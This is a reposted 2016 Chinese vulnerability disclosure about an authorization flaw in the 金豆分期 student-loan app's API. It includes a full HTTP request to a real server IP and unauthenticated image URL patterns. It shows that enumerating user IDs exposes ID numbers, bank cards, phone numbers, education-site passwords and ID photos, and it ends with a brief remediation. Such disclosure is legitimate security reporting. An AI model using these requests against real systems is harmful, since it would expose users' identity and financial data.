频道栏目
首页 > 安全 > 网络安全 > 正文
金豆分期越权获取12w用户数据(身份证/手机号/银行卡/学信网账号跟密码)
2016-05-09 09:05:22           
收藏   我要投稿

https://android.myapp.com/myapp/detail.htm?apkName=com.example.jindou


下载APP

1.越权问题,APP多接口可越权,并能通过burpsuite遍历获取用户数据

例如

获取用户资料接口
 

POST https://60.211.217.162:9001/fqApi/api/stuUser/getStuUser.do HTTP/1.1
Content-Length: 203
Content-Type: text/plain; charset=UTF-8
Host: 60.211.217.162:9001
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; zh-cn; Google Nexus 4 - 4.1.1 - API 16 - 768x1280_2 Build/JRO03S) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Cookie: JSESSIONID=4360C221EB109302BF98509849CDB560
Cookie2: $Version=1
Accept-Encoding: gzip

{"header":{"device":"Genymotion,Google Nexus 4 - 4.1.1 - API 16 - 768x1280_2,vbox86p","macadd":"123456","platform":"generic,ANDROID,4.1.1"},"request":{"params":{"USER_ID":"110077"},"tokencode":"117386"}}



查看返回数据包涵那些数据(这是user_id=110077的返回数据)
 

QQ截图20160429224804.png



由上往下分别是

银行卡号,邮箱,身份证,手机号,还有一个手机验证的密码(不知道用来干啥),学信网账号跟密码





遍历user_id
 

QQ截图20160429223947.png





这边只列出银行卡号跟身份证号还有姓名

 

QQ截图20160429224058.png





甚至还有用户学信网的账号跟密码

可登陆查看学信档案
 

QQ截图20160429224552.png





身份证图片文件未授权访问。同样能遍历





手持身份证图片
 

https://60.211.217.162:9001//opt/xydWeb/ArchFiles/upload/FqApiUploadFiles/authPic/110077/hold.jpg?time=1461941777435



学生证
 

https://60.211.217.162:9001//opt/xydWeb/ArchFiles/upload/FqApiUploadFiles/authPic/110077/stucard.jpg?time=1461941777435



身份证图片
 

https://60.211.217.162:9001//opt/xydWeb/ArchFiles/upload/FqApiUploadFiles/authPic/110077/front.jpg?time=1461941777435



同样能遍历,遍历链接中的user_id(上面的userid是110077)

例如
 

https://60.211.217.162:9001//opt/xydWeb/ArchFiles/upload/FqApiUploadFiles/authPic/110048/hold.jpg?time=1461941777435


 

https://60.211.217.162:9001//opt/xydWeb/ArchFiles/upload/FqApiUploadFiles/authPic/110047/hold.jpg?time=1461941777435



全站数据,不是问题

3.紧急联系人越权获取
 

QQ截图20160429230029.png


 

QQ截图20160429230056.png



同样能遍历,就不演示了


 

 

解决方案:

加上会话,做好权限控制

 

点击复制链接 与好友分享!回本站首页
上一篇:文轩网某管理系统SQL注入(垃圾袋引发的血案/大量数据/多处管理员帐号/内部信息/上千名管理员/内部资料/敏感信息)
下一篇:中国国旅多个系统存在漏洞/后台沦陷/十几个数据库可操控/泄露千万客户信息/几十万注册用户密码
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站